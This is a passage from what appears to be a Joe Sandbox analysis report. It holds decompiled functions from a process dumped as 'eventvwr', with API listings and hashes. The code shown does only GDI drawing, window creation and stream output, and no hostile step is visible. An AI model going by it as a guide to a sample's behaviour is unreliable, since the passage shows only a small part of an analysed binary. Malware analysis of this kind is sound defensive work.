                                                                                                				_t92 = _t91 / _v16;
                                                                                                				 *_t80 = _t92;
                                                                                                				asm("fild dword [ebp+0x8]");
                                                                                                				if(_t51 < 0) {
                                                                                                					_t92 = _t92 +  *0xc14438;
                                                                                                				}
                                                                                                				_v24 = _t92;
                                                                                                				_t52 = rand();
                                                                                                				asm("cdq");
                                                                                                				_a4 = _t52 % (_t57 - 1);
                                                                                                				asm("fild dword [ebp+0x8]");
                                                                                                				_t80[1] = _t92 / _v24;
                                                                                                				_t80[2] = _v32 / _v16;
                                                                                                				_t80[3] = _v40 / _v24;
                                                                                                				_t54 = rand();
                                                                                                				asm("cdq");
                                                                                                				_t67 = 5;
                                                                                                				_t75 = _t54 % _t67;
                                                                                                				if(_t75 == 0) {
                                                                                                					_t56 =  *0xc165c4; // 0x0
                                                                                                				} else {
                                                                                                					_t76 = _t75 - 1;
                                                                                                					if(_t76 == 0) {
                                                                                                						_t56 =  *0xc165c8; // 0x0
                                                                                                					} else {
                                                                                                						_t77 = _t76 - 1;
                                                                                                						if(_t77 == 0) {
                                                                                                							_t56 =  *0xc165cc; // 0x0
                                                                                                						} else {
                                                                                                							_t78 = _t77 - 1;
                                                                                                							if(_t78 == 0) {
                                                                                                								_t56 =  *0xc165d0; // 0x0
                                                                                                							} else {
                                                                                                								if(_t78 == 1) {
                                                                                                									_t56 =  *0xc165d4; // 0x0
                                                                                                								} else {
                                                                                                									_t56 = GetStockObject(0);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_t80[4] = _t56;
                                                                                                				return _t56;
                                                                                                			}























                                                                                                0x00c11772
                                                                                                0x00c11772
                                                                                                0x00c11780
                                                                                                0x00c1178c
                                                                                                0x00c1178e
                                                                                                0x00c11791
                                                                                                0x00c11796
                                                                                                0x00c11798
                                                                                                0x00c11798
                                                                                                0x00c1179e
                                                                                                0x00c117aa
                                                                                                0x00c117ac
                                                                                                0x00c117af
                                                                                                0x00c117b4
                                                                                                0x00c117b6
                                                                                                0x00c117b6
                                                                                                0x00c117bf
                                                                                                0x00c117c2
                                                                                                0x00c117c7
                                                                                                0x00c117c9
                                                                                                0x00c117c9
                                                                                                0x00c117cf
                                                                                                0x00c117d2
                                                                                                0x00c117d7
                                                                                                0x00c117db
                                                                                                0x00c117dd
                                                                                                0x00c117e0
                                                                                                0x00c117e3
                                                                                                0x00c117e6
                                                                                                0x00c117e9
                                                                                                0x00c117eb
                                                                                                0x00c117f0
                                                                                                0x00c117f2
                                                                                                0x00c117f2
                                                                                                0x00c117f8
                                                                                                0x00c117fb
                                                                                                0x00c117fd
                                                                                                0x00c11801
                                                                                                0x00c11804
                                                                                                0x00c1180a
                                                                                                0x00c11813
                                                                                                0x00c1181c
                                                                                                0x00c1181f
                                                                                                0x00c11823
                                                                                                0x00c11824
                                                                                                0x00c11827
                                                                                                0x00c1182a
                                                                                                0x00c1185e
                                                                                                0x00c1182c
                                                                                                0x00c1182c
                                                                                                0x00c1182d
                                                                                                0x00c11857
                                                                                                0x00c1182f
                                                                                                0x00c1182f
                                                                                                0x00c11830
                                                                                                0x00c11850
                                                                                                0x00c11832
                                                                                                0x00c11832
                                                                                                0x00c11833
                                                                                                0x00c11849
                                                                                                0x00c11835
                                                                                                0x00c11836
                                                                                                0x00c11842
                                                                                                0x00c11838
                                                                                                0x00c1183a
                                                                                                0x00c1183a
                                                                                                0x00c11836
                                                                                                0x00c11833
                                                                                                0x00c11830
                                                                                                0x00c1182d
                                                                                                0x00c11864
                                                                                                0x00c11869

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: rand$ObjectStock
                                                                                                • String ID:
                                                                                                • API String ID: 2053096085-0
                                                                                                • Opcode ID: 819f3d62ee0b8f6cf48ad670f3b638b13b9617d09058176fc58f79ccc57ea27f
                                                                                                • Instruction ID: e7643493a13bb53a671e8a5066dac4c0687e14cdfff3b9327c012c254a12d23a
                                                                                                • Opcode Fuzzy Hash: 819f3d62ee0b8f6cf48ad670f3b638b13b9617d09058176fc58f79ccc57ea27f
                                                                                                • Instruction Fuzzy Hash: FE319130E08919E7DB089F5AE8847ECBFB6FB86300F66C059D945561C0DB719EE0EB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 100%
                                                                                                			E00C11271(struct HWND__* _a4) {
                                                                                                				struct tagRECT _v20;
                                                                                                				struct HDC__* _t9;
                                                                                                				void* _t14;
                                                                                                				struct HDC__* _t17;
                                                                                                				struct HDC__* _t19;
                                                                                                
                                                                                                				_t9 =  *0xc165a0; // 0x0
                                                                                                				if(_t9 == 0) {
                                                                                                					GetClientRect(_a4,  &_v20);
                                                                                                					_t19 = GetDC(_a4);
                                                                                                					 *0xc165a0 = CreateCompatibleDC(_t19);
                                                                                                					_t14 = CreateCompatibleBitmap(_t19, _v20.right - _v20.left, _v20.bottom - _v20.top);
                                                                                                					 *0xc165a4 = _t14;
                                                                                                					SelectObject( *0xc165a0, _t14);
                                                                                                					ReleaseDC(_a4, _t19);
                                                                                                					_t17 =  *0xc165a0; // 0x0
                                                                                                					return _t17;
                                                                                                				}
                                                                                                				return _t9;
                                                                                                			}








                                                                                                0x00c11274
                                                                                                0x00c1127e
                                                                                                0x00c1128a
                                                                                                0x00c112a5
                                                                                                0x00c112b1
                                                                                                0x00c112b6
                                                                                                0x00c112c3
                                                                                                0x00c112c8
                                                                                                0x00c112d2
                                                                                                0x00c112d8
                                                                                                0x00000000
                                                                                                0x00c112df
                                                                                                0x00c112e1

                                                                                                APIs
                                                                                                • GetClientRect.USER32 ref: 00C1128A
                                                                                                • GetDC.USER32(?), ref: 00C1129F
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00C112A8
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C112B6
                                                                                                • SelectObject.GDI32(00000000), ref: 00C112C8
                                                                                                • ReleaseDC.USER32 ref: 00C112D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: CompatibleCreate$BitmapClientObjectRectReleaseSelect
                                                                                                • String ID:
                                                                                                • API String ID: 4043710568-0
                                                                                                • Opcode ID: 6639f86322639685d7d24f3f9ada74817a804ee3b36deaef86ee848f2411f0b5
                                                                                                • Instruction ID: f5d02cee94193154edec8b93df7064e39313fa69b13995866e95c490347eb79c
                                                                                                • Opcode Fuzzy Hash: 6639f86322639685d7d24f3f9ada74817a804ee3b36deaef86ee848f2411f0b5
                                                                                                • Instruction Fuzzy Hash: 9701E876500208EFCF049FA9EC48BEE7F79FB4A3957008419FA01E3224E730A940DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 267 c111ba-c11232 call c11c1e * 2 DeleteObject * 6 273 c11242-c11250 267->273 274 c11234-c1123b DeleteDC 267->274 275 c11252-c11255 DeleteObject 273->275 276 c1125c-c11263 273->276 274->273 275->276 277 c11265-c11268 DeleteObject 276->277 278 c1126f-c11270 276->278 277->278
                                                                                                C-Code - Quality: 95%
                                                                                                			E00C111BA() {
                                                                                                				void* __esi;
                                                                                                				struct HDC__* _t10;
                                                                                                				void* _t11;
                                                                                                				void* _t12;
                                                                                                				int _t13;
                                                                                                
                                                                                                				E00C11C1E(0xc165f4);
                                                                                                				E00C11C1E(0xc16610);
                                                                                                				DeleteObject( *0xc165c0);
                                                                                                				DeleteObject( *0xc165c4);
                                                                                                				DeleteObject( *0xc165c8);
                                                                                                				DeleteObject( *0xc165cc);
                                                                                                				DeleteObject( *0xc165d0);
                                                                                                				DeleteObject( *0xc165d4);
                                                                                                				 *0xc165c0 = 0;
                                                                                                				 *0xc165c4 = 0;
                                                                                                				 *0xc165c8 = 0;
                                                                                                				 *0xc165cc = 0;
                                                                                                				 *0xc165d0 = 0;
                                                                                                				 *0xc165d4 = 0;
                                                                                                				_pop(_t19);
                                                                                                				_t10 =  *0xc165a0; // 0x0
                                                                                                				if(_t10 != 0) {
                                                                                                					DeleteDC(_t10);
                                                                                                					 *0xc165a0 =  *0xc165a0 & 0x00000000;
                                                                                                				}
                                                                                                				_t11 =  *0xc165a4; // 0x0
                                                                                                				if(_t11 != 0) {
                                                                                                					DeleteObject(_t11);
                                                                                                					 *0xc165a4 =  *0xc165a4 & 0x00000000;
                                                                                                				}
                                                                                                				_t12 =  *0xc165d8; // 0x0
                                                                                                				if(_t12 != 0) {
                                                                                                					_t13 = DeleteObject(_t12);
                                                                                                					 *0xc165d8 =  *0xc165d8 & 0x00000000;
                                                                                                					return _t13;
                                                                                                				}
                                                                                                				return _t12;
                                                                                                			}








                                                                                                0x00c111c0
                                                                                                0x00c111ca
                                                                                                0x00c111db
                                                                                                0x00c111e3
                                                                                                0x00c111eb
                                                                                                0x00c111f3
                                                                                                0x00c111fb
                                                                                                0x00c11203
                                                                                                0x00c11207
                                                                                                0x00c1120c
                                                                                                0x00c11211
                                                                                                0x00c11216
                                                                                                0x00c1121b
                                                                                                0x00c11220
                                                                                                0x00c11225
                                                                                                0x00c1122b
                                                                                                0x00c11232
                                                                                                0x00c11235
                                                                                                0x00c1123b
                                                                                                0x00c1123b
                                                                                                0x00c11242
                                                                                                0x00c11250
                                                                                                0x00c11253
                                                                                                0x00c11255
                                                                                                0x00c11255
                                                                                                0x00c1125c
                                                                                                0x00c11263
                                                                                                0x00c11266
                                                                                                0x00c11268
                                                                                                0x00000000
                                                                                                0x00c11268
                                                                                                0x00c11270

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteObject$??3@
                                                                                                • String ID:
                                                                                                • API String ID: 3140518222-0
                                                                                                • Opcode ID: 3ac9f387272ff8b478c8f1a6f58182ddf51d255a94430ef50e58e2bbb14f3913
                                                                                                • Instruction ID: cb56bf464c8c4170a4a9be68876ff5f3528efd920cb0c8c5f21efbf5a52bb918
                                                                                                • Opcode Fuzzy Hash: 3ac9f387272ff8b478c8f1a6f58182ddf51d255a94430ef50e58e2bbb14f3913
                                                                                                • Instruction Fuzzy Hash: 1CF014719411249ECB51AF25ED057CD3EABF70B3643058077D508D2279EB320894EF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 32%
                                                                                                			E00C11EAD(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t49;
                                                                                                				intOrPtr _t53;
                                                                                                				intOrPtr _t57;
                                                                                                				intOrPtr _t61;
                                                                                                				void* _t72;
                                                                                                				intOrPtr _t73;
                                                                                                				void* _t76;
                                                                                                				intOrPtr _t77;
                                                                                                				signed int _t78;
                                                                                                				signed int _t80;
                                                                                                				void* _t81;
                                                                                                				intOrPtr _t89;
                                                                                                				void* _t91;
                                                                                                				intOrPtr* _t93;
                                                                                                				void* _t94;
                                                                                                				signed int _t100;
                                                                                                
                                                                                                				_push(0x14);
                                                                                                				E00C130EB(E00C13308, __ebx, __edi, __esi);
                                                                                                				_t93 =  *((intOrPtr*)(_t94 + 8));
                                                                                                				_t49 =  *((intOrPtr*)(_t94 + 0xc));
                                                                                                				_t80 = 0;
                                                                                                				 *(_t94 - 0x14) = 0;
                                                                                                				_t81 = _t49 + 1;
                                                                                                				do {
                                                                                                					_t89 =  *_t49;
                                                                                                					_t49 = _t49 + 1;
                                                                                                				} while (_t89 != 0);
                                                                                                				_t91 = _t49 - _t81;
                                                                                                				_t53 =  *((intOrPtr*)( *((intOrPtr*)( *_t93 + 4)) + _t93 + 0x18));
                                                                                                				if(_t53 > 0 && _t53 > _t91) {
                                                                                                					_t78 = _t53 - _t91;
                                                                                                					_t100 = _t78;
                                                                                                					_t80 = _t78;
                                                                                                				}
                                                                                                				_push(_t94 - 0x20);
                                                                                                				E00C11CCA(_t91, _t93, _t100);
                                                                                                				 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
                                                                                                				if( *((char*)(_t94 - 0x1c)) != 0) {
                                                                                                					 *(_t94 - 4) = 1;
                                                                                                					_t57 =  *((intOrPtr*)( *_t93 + 4));
                                                                                                					__eflags = ( *(_t57 + _t93 + 0x10) & 0x000001c0) - 0x40;
                                                                                                					if(( *(_t57 + _t93 + 0x10) & 0x000001c0) == 0x40) {
                                                                                                						L12:
                                                                                                						_t61 =  *((intOrPtr*)( *_t93 + 4));
                                                                                                						__imp__?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH@Z( *((intOrPtr*)(_t94 + 0xc)), _t91);
                                                                                                						__eflags = _t61 - _t91;
                                                                                                						if(_t61 == _t91) {
                                                                                                							while(1) {
                                                                                                								__eflags = _t80;
                                                                                                								if(_t80 <= 0) {
                                                                                                									goto L14;
                                                                                                								}
                                                                                                								_t72 =  *((intOrPtr*)( *_t93 + 4)) + _t93;
                                                                                                								_t73 =  *((intOrPtr*)(_t72 + 0x28));
                                                                                                								 *((char*)(_t94 - 0x18)) =  *((intOrPtr*)(_t72 + 0x30));
                                                                                                								__imp__?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z( *((intOrPtr*)(_t94 - 0x18)));
                                                                                                								__eflags = _t73 - 0xffffffff;
                                                                                                								if(_t73 != 0xffffffff) {
                                                                                                									_t80 = _t80 - 1;
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									 *(_t94 - 0x14) =  *(_t94 - 0x14) | 0x00000004;
                                                                                                									goto L14;
                                                                                                								}
                                                                                                								L21:
                                                                                                							}
                                                                                                						} else {
                                                                                                							 *(_t94 - 0x14) = 4;
                                                                                                						}
                                                                                                					} else {
                                                                                                						while(1) {
                                                                                                							__eflags = _t80;
                                                                                                							if(_t80 <= 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t76 =  *((intOrPtr*)( *_t93 + 4)) + _t93;
                                                                                                							_t77 =  *((intOrPtr*)(_t76 + 0x28));
                                                                                                							 *((char*)(_t94 - 0x18)) =  *((intOrPtr*)(_t76 + 0x30));
                                                                                                							__imp__?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z( *((intOrPtr*)(_t94 - 0x18)));
                                                                                                							__eflags = _t77 - 0xffffffff;
                                                                                                							if(_t77 != 0xffffffff) {
                                                                                                								_t80 = _t80 - 1;
                                                                                                								continue;
                                                                                                							} else {
                                                                                                								_t22 = _t94 - 0x14;
                                                                                                								 *_t22 =  *(_t94 - 0x14) | 0x00000004;
                                                                                                								__eflags =  *_t22;
                                                                                                							}
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags =  *(_t94 - 0x14);
                                                                                                						if( *(_t94 - 0x14) == 0) {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                					}
                                                                                                					L14:
                                                                                                					 *( *((intOrPtr*)( *_t93 + 4)) + _t93 + 0x18) =  *( *((intOrPtr*)( *_t93 + 4)) + _t93 + 0x18) & 0x00000000;
                                                                                                					_t33 = _t94 - 4;
                                                                                                					 *_t33 =  *(_t94 - 4) & 0x00000000;
                                                                                                					__eflags =  *_t33;
                                                                                                				} else {
                                                                                                					 *(_t94 - 0x14) = 4;
                                                                                                				}
                                                                                                				__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z( *(_t94 - 0x14), 0);
                                                                                                				 *(_t94 - 4) =  *(_t94 - 4) | 0xffffffff;
                                                                                                				_push(_t94 - 0x20);
                                                                                                				E00C11D28(_t93,  *(_t94 - 4));
                                                                                                				return E00C13121(_t93);
                                                                                                				goto L21;
                                                                                                			}



















                                                                                                0x00c11ead
                                                                                                0x00c11eb4
                                                                                                0x00c11eb9
                                                                                                0x00c11ebc
                                                                                                0x00c11ebf
                                                                                                0x00c11ec1
                                                                                                0x00c11ec4
                                                                                                0x00c11ec7
                                                                                                0x00c11ec7
                                                                                                0x00c11ec9
                                                                                                0x00c11eca
                                                                                                0x00c11ed0
                                                                                                0x00c11ed7
                                                                                                0x00c11edd
                                                                                                0x00c11ee3
                                                                                                0x00c11ee3
                                                                                                0x00c11ee5
                                                                                                0x00c11ee5
                                                                                                0x00c11eea
                                                                                                0x00c11eeb
                                                                                                0x00c11ef0
                                                                                                0x00c11ef8
                                                                                                0x00c11f03
                                                                                                0x00c11f09
                                                                                                0x00c11f15
                                                                                                0x00c11f18
                                                                                                0x00c11f48
                                                                                                0x00c11f4a
                                                                                                0x00c11f55
                                                                                                0x00c11f5b
                                                                                                0x00c11f5d
                                                                                                0x00c11fa2
                                                                                                0x00c11fa2
                                                                                                0x00c11fa4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c11fab
                                                                                                0x00c11fb0
                                                                                                0x00c11fb3
                                                                                                0x00c11fbb
                                                                                                0x00c11fc1
                                                                                                0x00c11fc4
                                                                                                0x00c11fcc
                                                                                                0x00000000
                                                                                                0x00c11fc6
                                                                                                0x00c11fc6
                                                                                                0x00000000
                                                                                                0x00c11fc6
                                                                                                0x00000000
                                                                                                0x00c11fc4
                                                                                                0x00c11f5f
                                                                                                0x00c11f5f
                                                                                                0x00c11f5f
                                                                                                0x00c11f1a
                                                                                                0x00c11f1a
                                                                                                0x00c11f1a
                                                                                                0x00c11f1c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c11f23
                                                                                                0x00c11f28
                                                                                                0x00c11f2b
                                                                                                0x00c11f33
                                                                                                0x00c11f39
                                                                                                0x00c11f3c
                                                                                                0x00c11f9c
                                                                                                0x00000000
                                                                                                0x00c11f3e
                                                                                                0x00c11f3e
                                                                                                0x00c11f3e
                                                                                                0x00c11f3e
                                                                                                0x00c11f3e
                                                                                                0x00000000
                                                                                                0x00c11f3c
                                                                                                0x00c11f42
                                                                                                0x00c11f46
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c11f46
                                                                                                0x00c11f66
                                                                                                0x00c11f6d
                                                                                                0x00c11f71
                                                                                                0x00c11f71
                                                                                                0x00c11f71
                                                                                                0x00c11efa
                                                                                                0x00c11efa
                                                                                                0x00c11efa
                                                                                                0x00c11f81
                                                                                                0x00c11f87
                                                                                                0x00c11f8e
                                                                                                0x00c11f8f
                                                                                                0x00c11f9b
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • __EH_prolog3_catch.LIBCMT ref: 00C11EB4
                                                                                                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP90(?,?,00000014,00C1160C,?,FrameRate: ), ref: 00C11F33
                                                                                                • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH@Z.MSVCP90(?,?,?,00000014,00C1160C,?,FrameRate: ), ref: 00C11F55
                                                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP90(?,00000000), ref: 00C11F81
                                                                                                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP90(?), ref: 00C11FBB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?setstate@?$basic_ios@?sputn@?$basic_streambuf@H_prolog3_catch
                                                                                                • String ID:
                                                                                                • API String ID: 1934335076-0
                                                                                                • Opcode ID: 42d4b20e9b5760a3dbce8ed36a7011867400e62ba9c9d2efdd2165f8666af61a
                                                                                                • Instruction ID: 016cf85252668003b2648736761e1e82606584cd3335aae2cfd99635070e640f
                                                                                                • Opcode Fuzzy Hash: 42d4b20e9b5760a3dbce8ed36a7011867400e62ba9c9d2efdd2165f8666af61a
                                                                                                • Instruction Fuzzy Hash: 6C415034A002458FCB11CF99C589BED7BF0AF1A314F284558EA51DB3A2C739DE85DB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 45%
                                                                                                			E00C11DA6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr _t11;
                                                                                                				void* _t18;
                                                                                                				void* _t19;
                                                                                                				void* _t23;
                                                                                                				void* _t24;
                                                                                                
                                                                                                				_t19 = __edx;
                                                                                                				_t18 = __ecx;
                                                                                                				_push(0x44);
                                                                                                				E00C130B8(E00C13350, __ebx, __edi, __esi);
                                                                                                				_t11 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                				_t23 = 0x6666666 - _t11;
                                                                                                				if(0x6666666 < __edx) {
                                                                                                					_t18 = _t24 - 0x28;
                                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z("list<T> too long");
                                                                                                					_t3 = _t24 - 4;
                                                                                                					 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                                                                                                					_push(_t24 - 0x28);
                                                                                                					_push(_t24 - 0x50);
                                                                                                					E00C11083(_t23,  *_t3);
                                                                                                					_push(0xc14748);
                                                                                                					_t11 = _t24 - 0x50;
                                                                                                					_push(_t11);
                                                                                                					L00C131EC();
                                                                                                				}
                                                                                                				_t12 = _t11 + _t19;
                                                                                                				 *((intOrPtr*)(_t18 + 0x18)) = _t11 + _t19;
                                                                                                				return E00C13121(_t12);
                                                                                                			}








                                                                                                0x00c11da6
                                                                                                0x00c11da6
                                                                                                0x00c11da6
                                                                                                0x00c11dad
                                                                                                0x00c11db2
                                                                                                0x00c11dba
                                                                                                0x00c11dbe
                                                                                                0x00c11dc5
                                                                                                0x00c11dc8
                                                                                                0x00c11dce
                                                                                                0x00c11dce
                                                                                                0x00c11dd5
                                                                                                0x00c11dd9
                                                                                                0x00c11dda
                                                                                                0x00c11ddf
                                                                                                0x00c11de4
                                                                                                0x00c11de7
                                                                                                0x00c11de8
                                                                                                0x00c11de8
                                                                                                0x00c11ded
                                                                                                0x00c11def
                                                                                                0x00c11df7

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00C11DAD
                                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(list<T> too long,00000044,00C11C74,?,?,?,?,00C165F4,?,00C1176B,00C165F4,?,?,011767E0), ref: 00C11DC8
                                                                                                  • Part of subcall function 00C11083: __EH_prolog3.LIBCMT ref: 00C1108A
                                                                                                  • Part of subcall function 00C11083: ??0exception@std@@QAE@XZ.MSVCR90(00000000,00C11DDF,?,?), ref: 00C11094
                                                                                                  • Part of subcall function 00C11083: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00C110AA
                                                                                                • _CxxThrowException.MSVCR90(?,00C14748), ref: 00C11DE8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prolog3U?$char_traits@V?$allocator@$??0exception@std@@ExceptionThrowV01@@
                                                                                                • String ID: list<T> too long
                                                                                                • API String ID: 265151731-4027344264
                                                                                                • Opcode ID: ab2da16fa2daeb6d69ec4c56d119111b970747fd1431d735683dd4ecdb1c03cd
                                                                                                • Instruction ID: 30e903c907c844b2f57704f5f81bfbdf00e215bef716f57bff4e8b732d486b52
                                                                                                • Opcode Fuzzy Hash: ab2da16fa2daeb6d69ec4c56d119111b970747fd1431d735683dd4ecdb1c03cd
                                                                                                • Instruction Fuzzy Hash: 30F0A072D00248ABCF04EBE0E846ADC77B86B0A304FA80028E100E7150EA75CB85F7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00C12435(struct HINSTANCE__* __eax, int _a4) {
                                                                                                				struct tagRECT _v20;
                                                                                                				struct HWND__* _t24;
                                                                                                
                                                                                                				 *0xc1640c = __eax;
                                                                                                				_t24 = CreateWindowExW(0, 0xc16410, 0xc164d8, 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __eax, 0);
                                                                                                				if(_t24 != 0) {
                                                                                                					GetClientRect(_t24,  &_v20);
                                                                                                					E00C11129(_v20.right - _v20.left, _v20.bottom - _v20.top);
                                                                                                					ShowWindow(_t24, _a4);
                                                                                                					UpdateWindow(_t24);
                                                                                                					return 1;
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}





                                                                                                0x00c12444
                                                                                                0x00c12467
                                                                                                0x00c1246b
                                                                                                0x00c12476
                                                                                                0x00c1248a
                                                                                                0x00c12495
                                                                                                0x00c1249c
                                                                                                0x00000000
                                                                                                0x00c124a4
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CreateWindowExW.USER32 ref: 00C12461
                                                                                                • GetClientRect.USER32 ref: 00C12476
                                                                                                • ShowWindow.USER32(00000000,00C1235C,?,?,00C1235C,?), ref: 00C12495
                                                                                                • UpdateWindow.USER32(00000000), ref: 00C1249C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ClientCreateRectShowUpdate
                                                                                                • String ID:
                                                                                                • API String ID: 2980773425-0
                                                                                                • Opcode ID: e538f873d972a54e773443fea960c5821c5e85220614da626e6234382dec7350
                                                                                                • Instruction ID: 046a31a6a618d5cf8b0d088eba916c7c231a82ceb2fa9a0c274777916678f684
                                                                                                • Opcode Fuzzy Hash: e538f873d972a54e773443fea960c5821c5e85220614da626e6234382dec7350
                                                                                                • Instruction Fuzzy Hash: 4B01FF76540124BE9710DBA9DC49EFF7FACEB4B660B204414F919D2150D624954196A4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 61%
                                                                                                			E00C119A1(intOrPtr* __esi, struct HDC__* _a4, intOrPtr _a8) {
                                                                                                				char _v5;
                                                                                                				char _v6;
                                                                                                				char _v7;
                                                                                                				char _v8;
                                                                                                				struct HDC__* _v12;
                                                                                                				struct HDC__* _v16;
                                                                                                				struct HDC__* _t19;
                                                                                                				void* _t21;
                                                                                                				void* _t25;
